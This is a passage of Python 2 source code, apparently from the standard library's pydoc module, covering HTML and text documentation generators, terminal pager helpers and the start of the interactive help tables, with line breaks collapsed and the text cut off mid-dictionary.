url = path if sys.platform == 'win32': import nturl2path url = nturl2path.pathname2url(path) filelink = '<a href="file:%s">%s</a>' % (url, path) except TypeError: filelink = '(built-in)' info = [] if hasattr(object, '__version__'): version = _binstr(object.__version__) if version[:11] == '$' + 'Revision: ' and version[-1:] == '$': version = strip(version[11:-1]) info.append('version %s' % self.escape(version)) if hasattr(object, '__date__'): info.append(self.escape(_binstr(object.__date__))) if info: head = head + ' (%s)' % join(info, ', ') docloc = self.getdocloc(object) if docloc is not None: docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals() else: docloc = '' result = self.heading( head, '#ffffff', '#7799ee', '<a href=".">index</a><br>' + filelink + docloc) modules = inspect.getmembers(object, inspect.ismodule) classes, cdict = [], {} for key, value in inspect.getmembers(object, inspect.isclass): # if __all__ exists, believe it. Otherwise use old heuristic. if (all is not None or (inspect.getmodule(value) or object) is object): if visiblename(key, all, object): classes.append((key, value)) cdict[key] = cdict[value] = '#' + key for key, value in classes: for base in value.__bases__: key, modname = base.__name__, base.__module__ module = sys.modules.get(modname) if modname != name and module and hasattr(module, key): if getattr(module, key) is base: if not key in cdict: cdict[key] = cdict[base] = modname + '.html#' + key funcs, fdict = [], {} for key, value in inspect.getmembers(object, inspect.isroutine): # if __all__ exists, believe it. Otherwise use old heuristic. 
if (all is not None or inspect.isbuiltin(value) or inspect.getmodule(value) is object): if visiblename(key, all, object): funcs.append((key, value)) fdict[key] = '#-' + key if inspect.isfunction(value): fdict[value] = fdict[key] data = [] for key, value in inspect.getmembers(object, isdata): if visiblename(key, all, object): data.append((key, value)) doc = self.markup(getdoc(object), self.preformat, fdict, cdict) doc = doc and '<tt>%s</tt>' % doc result = result + '<p>%s</p>\n' % doc if hasattr(object, '__path__'): modpkgs = [] for importer, modname, ispkg in pkgutil.iter_modules(object.__path__): modpkgs.append((modname, name, ispkg, 0)) modpkgs.sort() contents = self.multicolumn(modpkgs, self.modpkglink) result = result + self.bigsection( 'Package Contents', '#ffffff', '#aa55cc', contents) elif modules: contents = self.multicolumn( modules, lambda key_value, s=self: s.modulelink(key_value[1])) result = result + self.bigsection( 'Modules', '#ffffff', '#aa55cc', contents) if classes: classlist = map(lambda key_value: key_value[1], classes) contents = [ self.formattree(inspect.getclasstree(classlist, 1), name)] for key, value in classes: contents.append(self.document(value, key, name, fdict, cdict)) result = result + self.bigsection( 'Classes', '#ffffff', '#ee77aa', join(contents)) if funcs: contents = [] for key, value in funcs: contents.append(self.document(value, key, name, fdict, cdict)) result = result + self.bigsection( 'Functions', '#ffffff', '#eeaa77', join(contents)) if data: contents = [] for key, value in data: contents.append(self.document(value, key)) result = result + self.bigsection( 'Data', '#ffffff', '#55aa55', join(contents, '<br>\n')) if hasattr(object, '__author__'): contents = self.markup(_binstr(object.__author__), self.preformat) result = result + self.bigsection( 'Author', '#ffffff', '#7799ee', contents) if hasattr(object, '__credits__'): contents = self.markup(_binstr(object.__credits__), self.preformat) result = result + self.bigsection( 'Credits', '#ffffff', '#7799ee', contents) return result def docclass(self, object, name=None, mod=None, funcs={}, classes={}, *ignored): """Produce HTML documentation for a class object.""" realname = object.__name__ name = name or realname bases = object.__bases__ contents = [] push = contents.append # Cute little class to pump out a horizontal rule between sections. class HorizontalRule: def __init__(self): self.needone = 0 def maybe(self): if self.needone: push('<hr>\n') self.needone = 1 hr = HorizontalRule() # List the mro, if non-trivial. mro = deque(inspect.getmro(object)) if len(mro) > 2: hr.maybe() push('<dl><dt>Method resolution order:</dt>\n') for base in mro: push('<dd>%s</dd>\n' % self.classlink(base, object.__module__)) push('</dl>\n') def spill(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: try: value = getattr(object, name) except Exception: # Some descriptors may meet a failure in their __get__. 
# (bug #1785) push(self._docdescriptor(name, value, mod)) else: push(self.document(value, name, mod, funcs, classes, mdict, object)) push('\n') return attrs def spilldescriptors(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: push(self._docdescriptor(name, value, mod)) return attrs def spilldata(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: base = self.docother(getattr(object, name), name, mod) if (hasattr(value, '__call__') or inspect.isdatadescriptor(value)): doc = getattr(value, "__doc__", None) else: doc = None if doc is None: push('<dl><dt>%s</dl>\n' % base) else: doc = self.markup(getdoc(value), self.preformat, funcs, classes, mdict) doc = '<dd><tt>%s</tt>' % doc push('<dl><dt>%s%s</dl>\n' % (base, doc)) push('\n') return attrs attrs = filter(lambda data: visiblename(data[0], obj=object), classify_class_attrs(object)) mdict = {} for key, kind, homecls, value in attrs: mdict[key] = anchor = '#' + name + '-' + key try: value = getattr(object, name) except Exception: # Some descriptors may meet a failure in their __get__. # (bug #1785) pass try: # The value may not be hashable (e.g., a data attr with # a dict or list value). mdict[value] = anchor except TypeError: pass while attrs: if mro: thisclass = mro.popleft() else: thisclass = attrs[0][2] attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass) if thisclass is __builtin__.object: attrs = inherited continue elif thisclass is object: tag = 'defined here' else: tag = 'inherited from %s' % self.classlink(thisclass, object.__module__) tag += ':<br>\n' # Sort attrs by name. try: attrs.sort(key=lambda t: t[0]) except TypeError: attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat # Pump out the attrs, segregated by kind. 
attrs = spill('Methods %s' % tag, attrs, lambda t: t[1] == 'method') attrs = spill('Class methods %s' % tag, attrs, lambda t: t[1] == 'class method') attrs = spill('Static methods %s' % tag, attrs, lambda t: t[1] == 'static method') attrs = spilldescriptors('Data descriptors %s' % tag, attrs, lambda t: t[1] == 'data descriptor') attrs = spilldata('Data and other attributes %s' % tag, attrs, lambda t: t[1] == 'data') assert attrs == [] attrs = inherited contents = ''.join(contents) if name == realname: title = '<a name="%s">class <strong>%s</strong></a>' % ( name, realname) else: title = '<strong>%s</strong> = <a name="%s">class %s</a>' % ( name, name, realname) if bases: parents = [] for base in bases: parents.append(self.classlink(base, object.__module__)) title = title + '(%s)' % join(parents, ', ') doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict) doc = doc and '<tt>%s<br>&nbsp;</tt>' % doc return self.section(title, '#000000', '#ffc8d8', contents, 3, doc) def formatvalue(self, object): """Format an argument default value as text.""" return self.grey('=' + self.repr(object)) def docroutine(self, object, name=None, mod=None, funcs={}, classes={}, methods={}, cl=None): """Produce HTML documentation for a function or method object.""" realname = object.__name__ name = name or realname anchor = (cl and cl.__name__ or '') + '-' + name note = '' skipdocs = 0 if inspect.ismethod(object): imclass = object.im_class if cl: if imclass is not cl: note = ' from ' + self.classlink(imclass, mod) else: if object.im_self is not None: note = ' method of %s instance' % self.classlink( object.im_self.__class__, mod) else: note = ' unbound %s method' % self.classlink(imclass,mod) object = object.im_func if name == realname: title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname) else: if (cl and realname in cl.__dict__ and cl.__dict__[realname] is object): reallink = '<a href="#%s">%s</a>' % ( cl.__name__ + '-' + realname, realname) skipdocs = 1 else: reallink = realname title = '<a name="%s"><strong>%s</strong></a> = %s' % ( anchor, name, reallink) if inspect.isfunction(object): args, varargs, varkw, defaults = inspect.getargspec(object) argspec = inspect.formatargspec( args, varargs, varkw, defaults, formatvalue=self.formatvalue) if realname == '<lambda>': title = '<strong>%s</strong> <em>lambda</em> ' % name argspec = argspec[1:-1] # remove parentheses else: argspec = '(...)' decl = title + argspec + (note and self.grey( '<font face="helvetica, arial">%s</font>' % note)) if skipdocs: return '<dl><dt>%s</dt></dl>\n' % decl else: doc = self.markup( getdoc(object), self.preformat, funcs, classes, methods) doc = doc and '<dd><tt>%s</tt></dd>' % doc return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc) def _docdescriptor(self, name, value, mod): results = [] push = results.append if name: push('<dl><dt><strong>%s</strong></dt>\n' % name) if value.__doc__ is not None: doc = self.markup(getdoc(value), self.preformat) push('<dd><tt>%s</tt></dd>\n' % doc) push('</dl>\n') return ''.join(results) def docproperty(self, object, name=None, mod=None, cl=None): """Produce html documentation for a property.""" return self._docdescriptor(name, object, mod) def docother(self, object, name=None, mod=None, *ignored): """Produce HTML documentation for a data object.""" lhs = name and '<strong>%s</strong> = ' % name or '' return lhs + self.repr(object) def docdata(self, object, name=None, mod=None, cl=None): """Produce html documentation for a data descriptor.""" return self._docdescriptor(name, 
object, mod) def index(self, dir, shadowed=None): """Generate an HTML index for a directory of modules.""" modpkgs = [] if shadowed is None: shadowed = {} for importer, name, ispkg in pkgutil.iter_modules([dir]): modpkgs.append((name, '', ispkg, name in shadowed)) shadowed[name] = 1 modpkgs.sort() contents = self.multicolumn(modpkgs, self.modpkglink) return self.bigsection(dir, '#ffffff', '#ee77aa', contents) # -------------------------------------------- text documentation generator class TextRepr(Repr): """Class for safely making a text representation of a Python object.""" def __init__(self): Repr.__init__(self) self.maxlist = self.maxtuple = 20 self.maxdict = 10 self.maxstring = self.maxother = 100 def repr1(self, x, level): if hasattr(type(x), '__name__'): methodname = 'repr_' + join(split(type(x).__name__), '_') if hasattr(self, methodname): return getattr(self, methodname)(x, level) return cram(stripid(repr(x)), self.maxother) def repr_string(self, x, level): test = cram(x, self.maxstring) testrepr = repr(test) if '\\' in test and '\\' not in replace(testrepr, r'\\', ''): # Backslashes are only literal in the string and are never # needed to make any special characters, so show a raw string. return 'r' + testrepr[0] + test + testrepr[0] return testrepr repr_str = repr_string def repr_instance(self, x, level): try: return cram(stripid(repr(x)), self.maxstring) except: return '<%s instance>' % x.__class__.__name__ class TextDoc(Doc): """Formatter class for text documentation.""" # ------------------------------------------- text formatting utilities _repr_instance = TextRepr() repr = _repr_instance.repr def bold(self, text): """Format a string in bold by overstriking.""" return join(map(lambda ch: ch + '\b' + ch, text), '') def indent(self, text, prefix=' '): """Indent text by prepending a given prefix to each line.""" if not text: return '' lines = split(text, '\n') lines = map(lambda line, prefix=prefix: prefix + line, lines) if lines: lines[-1] = rstrip(lines[-1]) return join(lines, '\n') def section(self, title, contents): """Format a section with a given heading.""" return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n' # ---------------------------------------------- type-specific routines def formattree(self, tree, modname, parent=None, prefix=''): """Render in text a class tree as returned by inspect.getclasstree().""" result = '' for entry in tree: if type(entry) is type(()): c, bases = entry result = result + prefix + classname(c, modname) if bases and bases != (parent,): parents = map(lambda c, m=modname: classname(c, m), bases) result = result + '(%s)' % join(parents, ', ') result = result + '\n' elif type(entry) is type([]): result = result + self.formattree( entry, modname, c, prefix + ' ') return result def docmodule(self, object, name=None, mod=None): """Produce text documentation for a given module object.""" name = object.__name__ # ignore the passed-in name synop, desc = splitdoc(getdoc(object)) result = self.section('NAME', name + (synop and ' - ' + synop)) try: all = object.__all__ except AttributeError: all = None try: file = inspect.getabsfile(object) except TypeError: file = '(built-in)' result = result + self.section('FILE', file) docloc = self.getdocloc(object) if docloc is not None: result = result + self.section('MODULE DOCS', docloc) if desc: result = result + self.section('DESCRIPTION', desc) classes = [] for key, value in inspect.getmembers(object, inspect.isclass): # if __all__ exists, believe it. Otherwise use old heuristic. 
if (all is not None or (inspect.getmodule(value) or object) is object): if visiblename(key, all, object): classes.append((key, value)) funcs = [] for key, value in inspect.getmembers(object, inspect.isroutine): # if __all__ exists, believe it. Otherwise use old heuristic. if (all is not None or inspect.isbuiltin(value) or inspect.getmodule(value) is object): if visiblename(key, all, object): funcs.append((key, value)) data = [] for key, value in inspect.getmembers(object, isdata): if visiblename(key, all, object): data.append((key, value)) modpkgs = [] modpkgs_names = set() if hasattr(object, '__path__'): for importer, modname, ispkg in pkgutil.iter_modules(object.__path__): modpkgs_names.add(modname) if ispkg: modpkgs.append(modname + ' (package)') else: modpkgs.append(modname) modpkgs.sort() result = result + self.section( 'PACKAGE CONTENTS', join(modpkgs, '\n')) # Detect submodules as sometimes created by C extensions submodules = [] for key, value in inspect.getmembers(object, inspect.ismodule): if value.__name__.startswith(name + '.') and key not in modpkgs_names: submodules.append(key) if submodules: submodules.sort() result = result + self.section( 'SUBMODULES', join(submodules, '\n')) if classes: classlist = map(lambda key_value: key_value[1], classes) contents = [self.formattree( inspect.getclasstree(classlist, 1), name)] for key, value in classes: contents.append(self.document(value, key, name)) result = result + self.section('CLASSES', join(contents, '\n')) if funcs: contents = [] for key, value in funcs: contents.append(self.document(value, key, name)) result = result + self.section('FUNCTIONS', join(contents, '\n')) if data: contents = [] for key, value in data: contents.append(self.docother(value, key, name, maxlen=70)) result = result + self.section('DATA', join(contents, '\n')) if hasattr(object, '__version__'): version = _binstr(object.__version__) if version[:11] == '$' + 'Revision: ' and version[-1:] == '$': version = strip(version[11:-1]) result = result + self.section('VERSION', version) if hasattr(object, '__date__'): result = result + self.section('DATE', _binstr(object.__date__)) if hasattr(object, '__author__'): result = result + self.section('AUTHOR', _binstr(object.__author__)) if hasattr(object, '__credits__'): result = result + self.section('CREDITS', _binstr(object.__credits__)) return result def docclass(self, object, name=None, mod=None, *ignored): """Produce text documentation for a given class object.""" realname = object.__name__ name = name or realname bases = object.__bases__ def makename(c, m=object.__module__): return classname(c, m) if name == realname: title = 'class ' + self.bold(realname) else: title = self.bold(name) + ' = class ' + realname if bases: parents = map(makename, bases) title = title + '(%s)' % join(parents, ', ') doc = getdoc(object) contents = doc and [doc + '\n'] or [] push = contents.append # List the mro, if non-trivial. mro = deque(inspect.getmro(object)) if len(mro) > 2: push("Method resolution order:") for base in mro: push(' ' + makename(base)) push('') # Cute little class to pump out a horizontal rule between sections. class HorizontalRule: def __init__(self): self.needone = 0 def maybe(self): if self.needone: push('-' * 70) self.needone = 1 hr = HorizontalRule() def spill(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: try: value = getattr(object, name) except Exception: # Some descriptors may meet a failure in their __get__. 
# (bug #1785) push(self._docdescriptor(name, value, mod)) else: push(self.document(value, name, mod, object)) return attrs def spilldescriptors(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: push(self._docdescriptor(name, value, mod)) return attrs def spilldata(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: if (hasattr(value, '__call__') or inspect.isdatadescriptor(value)): doc = getdoc(value) else: doc = None push(self.docother(getattr(object, name), name, mod, maxlen=70, doc=doc) + '\n') return attrs attrs = filter(lambda data: visiblename(data[0], obj=object), classify_class_attrs(object)) while attrs: if mro: thisclass = mro.popleft() else: thisclass = attrs[0][2] attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass) if thisclass is __builtin__.object: attrs = inherited continue elif thisclass is object: tag = "defined here" else: tag = "inherited from %s" % classname(thisclass, object.__module__) # Sort attrs by name. attrs.sort() # Pump out the attrs, segregated by kind. attrs = spill("Methods %s:\n" % tag, attrs, lambda t: t[1] == 'method') attrs = spill("Class methods %s:\n" % tag, attrs, lambda t: t[1] == 'class method') attrs = spill("Static methods %s:\n" % tag, attrs, lambda t: t[1] == 'static method') attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs, lambda t: t[1] == 'data descriptor') attrs = spilldata("Data and other attributes %s:\n" % tag, attrs, lambda t: t[1] == 'data') assert attrs == [] attrs = inherited contents = '\n'.join(contents) if not contents: return title + '\n' return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n' def formatvalue(self, object): """Format an argument default value as text.""" return '=' + self.repr(object) def docroutine(self, object, name=None, mod=None, cl=None): """Produce text documentation for a function or method object.""" realname = object.__name__ name = name or realname note = '' skipdocs = 0 if inspect.ismethod(object): imclass = object.im_class if cl: if imclass is not cl: note = ' from ' + classname(imclass, mod) else: if object.im_self is not None: note = ' method of %s instance' % classname( object.im_self.__class__, mod) else: note = ' unbound %s method' % classname(imclass,mod) object = object.im_func if name == realname: title = self.bold(realname) else: if (cl and realname in cl.__dict__ and cl.__dict__[realname] is object): skipdocs = 1 title = self.bold(name) + ' = ' + realname if inspect.isfunction(object): args, varargs, varkw, defaults = inspect.getargspec(object) argspec = inspect.formatargspec( args, varargs, varkw, defaults, formatvalue=self.formatvalue) if realname == '<lambda>': title = self.bold(name) + ' lambda ' argspec = argspec[1:-1] # remove parentheses else: argspec = '(...)' decl = title + argspec + note if skipdocs: return decl + '\n' else: doc = getdoc(object) or '' return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n') def _docdescriptor(self, name, value, mod): results = [] push = results.append if name: push(self.bold(name)) push('\n') doc = getdoc(value) or '' if doc: push(self.indent(doc)) push('\n') return ''.join(results) def docproperty(self, object, name=None, mod=None, cl=None): """Produce text documentation for a property.""" return self._docdescriptor(name, object, mod) def docdata(self, object, name=None, mod=None, cl=None): """Produce text documentation for a data 
descriptor.""" return self._docdescriptor(name, object, mod) def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None): """Produce text documentation for a data object.""" repr = self.repr(object) if maxlen: line = (name and name + ' = ' or '') + repr chop = maxlen - len(line) if chop < 0: repr = repr[:chop] + '...' line = (name and self.bold(name) + ' = ' or '') + repr if doc is not None: line += '\n' + self.indent(str(doc)) return line # --------------------------------------------------------- user interfaces def pager(text): """The first time this is called, determine what kind of pager to use.""" global pager pager = getpager() pager(text) def getpager(): """Decide what method to use for paging through text.""" if type(sys.stdout) is not types.FileType: return plainpager if not hasattr(sys.stdin, "isatty"): return plainpager if not sys.stdin.isatty() or not sys.stdout.isatty(): return plainpager if 'PAGER' in os.environ: if sys.platform == 'win32': # pipes completely broken in Windows return lambda text: tempfilepager(plain(text), os.environ['PAGER']) elif os.environ.get('TERM') in ('dumb', 'emacs'): return lambda text: pipepager(plain(text), os.environ['PAGER']) else: return lambda text: pipepager(text, os.environ['PAGER']) if os.environ.get('TERM') in ('dumb', 'emacs'): return plainpager if sys.platform == 'win32' or sys.platform.startswith('os2'): return lambda text: tempfilepager(plain(text), 'more <') if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0: return lambda text: pipepager(text, 'less') import tempfile (fd, filename) = tempfile.mkstemp() os.close(fd) try: if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0: return lambda text: pipepager(text, 'more') else: return ttypager finally: os.unlink(filename) def plain(text): """Remove boldface formatting from text.""" return re.sub('.\b', '', text) def pipepager(text, cmd): """Page through text by feeding it to another program.""" pipe = os.popen(cmd, 'w') try: pipe.write(_encode(text)) pipe.close() except IOError: pass # Ignore broken pipes caused by quitting the pager program. def tempfilepager(text, cmd): """Page through text by invoking a program on a temporary file.""" import tempfile filename = tempfile.mktemp() file = open(filename, 'w') file.write(_encode(text)) file.close() try: os.system(cmd + ' "' + filename + '"') finally: os.unlink(filename) def ttypager(text): """Page through text on a text terminal.""" lines = plain(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding))).split('\n') try: import tty fd = sys.stdin.fileno() old = tty.tcgetattr(fd) tty.setcbreak(fd) getchar = lambda: sys.stdin.read(1) except (ImportError, AttributeError): tty = None getchar = lambda: sys.stdin.readline()[:-1][:1] try: try: h = int(os.environ.get('LINES', 0)) except ValueError: h = 0 if h <= 1: h = 25 r = inc = h - 1 sys.stdout.write(join(lines[:inc], '\n') + '\n') while lines[r:]: sys.stdout.write('-- more --') sys.stdout.flush() c = getchar() if c in ('q', 'Q'): sys.stdout.write('\r \r') break elif c in ('\r', '\n'): sys.stdout.write('\r \r' + lines[r] + '\n') r = r + 1 continue if c in ('b', 'B', '\x1b'): r = r - inc - inc if r < 0: r = 0 sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n') r = r + inc finally: if tty: tty.tcsetattr(fd, tty.TCSAFLUSH, old) def plainpager(text): """Simply print unformatted text. 
This is the ultimate fallback.""" sys.stdout.write(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding))) def describe(thing): """Produce a short description of the given thing.""" if inspect.ismodule(thing): if thing.__name__ in sys.builtin_module_names: return 'built-in module ' + thing.__name__ if hasattr(thing, '__path__'): return 'package ' + thing.__name__ else: return 'module ' + thing.__name__ if inspect.isbuiltin(thing): return 'built-in function ' + thing.__name__ if inspect.isgetsetdescriptor(thing): return 'getset descriptor %s.%s.%s' % ( thing.__objclass__.__module__, thing.__objclass__.__name__, thing.__name__) if inspect.ismemberdescriptor(thing): return 'member descriptor %s.%s.%s' % ( thing.__objclass__.__module__, thing.__objclass__.__name__, thing.__name__) if inspect.isclass(thing): return 'class ' + thing.__name__ if inspect.isfunction(thing): return 'function ' + thing.__name__ if inspect.ismethod(thing): return 'method ' + thing.__name__ if type(thing) is types.InstanceType: return 'instance of ' + thing.__class__.__name__ return type(thing).__name__ def locate(path, forceload=0): """Locate an object by name or dotted path, importing as necessary.""" parts = [part for part in split(path, '.') if part] module, n = None, 0 while n < len(parts): nextmodule = safeimport(join(parts[:n+1], '.'), forceload) if nextmodule: module, n = nextmodule, n + 1 else: break if module: object = module else: object = __builtin__ for part in parts[n:]: try: object = getattr(object, part) except AttributeError: return None return object # --------------------------------------- interactive interpreter interface text = TextDoc() html = HTMLDoc() class _OldStyleClass: pass _OLD_INSTANCE_TYPE = type(_OldStyleClass()) def resolve(thing, forceload=0): """Given an object or a path to an object, get the object and its name.""" if isinstance(thing, str): object = locate(thing, forceload) if object is None: raise ImportError, 'no Python documentation found for %r' % thing return object, thing else: name = getattr(thing, '__name__', None) return thing, name if isinstance(name, str) else None def render_doc(thing, title='Python Library Documentation: %s', forceload=0): """Render text documentation, given an object or a path to an object.""" object, name = resolve(thing, forceload) desc = describe(object) module = inspect.getmodule(object) if name and '.' in name: desc += ' in ' + name[:name.rfind('.')] elif module and module is not object: desc += ' in module ' + module.__name__ if type(object) is _OLD_INSTANCE_TYPE: # If the passed object is an instance of an old-style class, # document its available methods instead of its value. object = object.__class__ elif not (inspect.ismodule(object) or inspect.isclass(object) or inspect.isroutine(object) or inspect.isgetsetdescriptor(object) or inspect.ismemberdescriptor(object) or isinstance(object, property)): # If the passed object is a piece of data or an instance, # document its available methods instead of its value. 
object = type(object) desc += ' object' return title % desc + '\n\n' + text.document(object, name) def doc(thing, title='Python Library Documentation: %s', forceload=0): """Display text documentation, given an object or a path to an object.""" try: pager(render_doc(thing, title, forceload)) except (ImportError, ErrorDuringImport), value: print value def writedoc(thing, forceload=0): """Write HTML documentation to a file in the current directory.""" try: object, name = resolve(thing, forceload) page = html.page(describe(object), html.document(object, name)) file = open(name + '.html', 'w') file.write(page) file.close() print 'wrote', name + '.html' except (ImportError, ErrorDuringImport), value: print value def writedocs(dir, pkgpath='', done=None): """Write out HTML documentation for all modules in a directory tree.""" if done is None: done = {} for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath): writedoc(modname) return class Helper: # These dictionaries map a topic name to either an alias, or a tuple # (label, seealso-items). The "label" is the label of the corresponding # section in the .rst file under Doc/ and an index into the dictionary # in pydoc_data/topics.py. # # CAUTION: if you change one of these dictionaries, be sure to adapt the # list of needed labels in Doc/tools/pyspecific.py and # regenerate the pydoc_data/topics.py file by running # make pydoc-topics # in Doc/ and copying the output file into the Lib/ directory. keywords = { 'and': 'BOOLEAN', 'as': 'with', 'assert': ('assert', ''), 'break': ('break', 'while for'), 'class': ('class', 'CLASSES SPECIALMETHODS'), 'continue': ('continue', 'while for'), 'def': ('function', ''), 'del': ('del', 'BASICMETHODS'), 'elif': 'if', 'else': ('else', 'while for'), 'except': 'try', 'exec': ('exec', ''), 'finally': 'try', 'for': ('for', 'break continue while'), 'from': 'import', 'global': ('global', 'NAMESPACES'), 'if': ('if', 'TRUTHVALUE'), 'import': ('import', 'MODULES'), 'in': ('in', 'SEQUENCEMETHODS2'), 'is': 'COMPARISON', 'lambda': ('lambda', 'FUNCTIONS'), 'not': 'BOOLEAN', 'or': 'BOOLEAN', 'pass': ('pass', ''), 'print': ('print', ''), 'raise': ('raise', 'EXCEPTIONS'), 'return': ('return', 'FUNCTIONS'), 'try': ('try', 'EXCEPTIONS'), 'while': ('while', 'break continue if TRUTHVALUE'), 'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'), 'yield': ('yield', ''), } # Either add symbols to this dictionary or to the symbols dictionary # directly: Whichever is easier. They are merged later. 
_symbols_inverse = { 'STRINGS' : ("'", "'''", "r'", "u'", '"""', '"', 'r"', 'u"'), 'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&', '|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'), 'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'), 'UNARY' : ('-', '~'), 'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=', '^=', '<<=', '>>=', '**=', '//='), 'BITWISE' : ('<<', '>>', '&', '|', '^', '~'), 'COMPLEX' : ('j', 'J') } symbols = { '%': 'OPERATORS FORMATTING', '**': 'POWER', ',': 'TUPLES LISTS FUNCTIONS', '.': 'ATTRIBUTES FLOAT MODULES OBJECTS', '...': 'ELLIPSIS', ':': 'SLICINGS DICTIONARYLITERALS', '@': 'def class', '\\': 'STRINGS', '_': 'PRIVATENAMES', '__': 'PRIVATENAMES SPECIALMETHODS', '`': 'BACKQUOTES', '(': 'TUPLES FUNCTIONS CALLS', ')': 'TUPLES FUNCTIONS CALLS', '[': 'LISTS SUBSCRIPTS SLICINGS', ']': 'LISTS SUBSCRIPTS SLICINGS' } for topic, symbols_ in _symbols_inverse.iteritems(): for symbol in symbols_: topics = symbols.get(symbol, topic) if topic not in topics: topics = topics + ' ' + topic symbols[symbol] = topics topics = { 'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS ' 'FUNCTIONS CLASSES MODULES FILES inspect'), 'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING ' 'TYPES'), 'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'), 'FORMATTING': ('formatstrings', 'OPERATORS'), 'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS ' 'FORMATTING TYPES'), 'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'), 'INTEGER': ('integers', 'int range'), 'FLOAT': ('floating', 'float math'), 'COMPLEX': ('imaginary', 'complex cmath'), 'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'), 'MAPPINGS': 'DICTIONARIES', 'FUNCTIONS': ('typesfunctions', 'def TYPES'), 'METHODS': ('typesmethods', 'class def CLASSES TYPES'), 'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'), 'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'), 'FRAMEOBJECTS': 'TYPES', 'TRACEBACKS': 'TYPES', 'NONE': ('bltin-null-object', ''), 'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'), 'FILES': ('bltin-file-objects', ''), 'SPECIALATTRIBUTES': ('specialattrs', ''), 'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'), 'MODULES': ('typesmodules', 'import'), 'PACKAGES': 'import', 'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN ' 'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER ' 'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES ' 'LISTS DICTIONARIES BACKQUOTES'), 'OPERATORS': 'EXPRESSIONS', 'PRECEDENCE': 'EXPRESSIONS', 'OBJECTS': ('objects', 'TYPES'), 'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS ' 'CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS ' 'SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'), 'BASICMETHODS': ('customization', 'cmp hash repr str SPECIALMETHODS'), 'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'), 'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'), 'SEQUENCEMETHODS1': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS2 ' 'SPECIALMETHODS'), 'SEQUENCEMETHODS2': ('sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 ' 'SPECIALMETHODS'), 'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'), 'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT ' 'SPECIALMETHODS'), 'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'), 'NAMESPACES': ('naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'), 'DYNAMICFEATURES': ('dynamic-features', ''), 'SCOPING': 'NAMESPACES', 'FRAMES': 'NAMESPACES', 'EXCEPTIONS': 
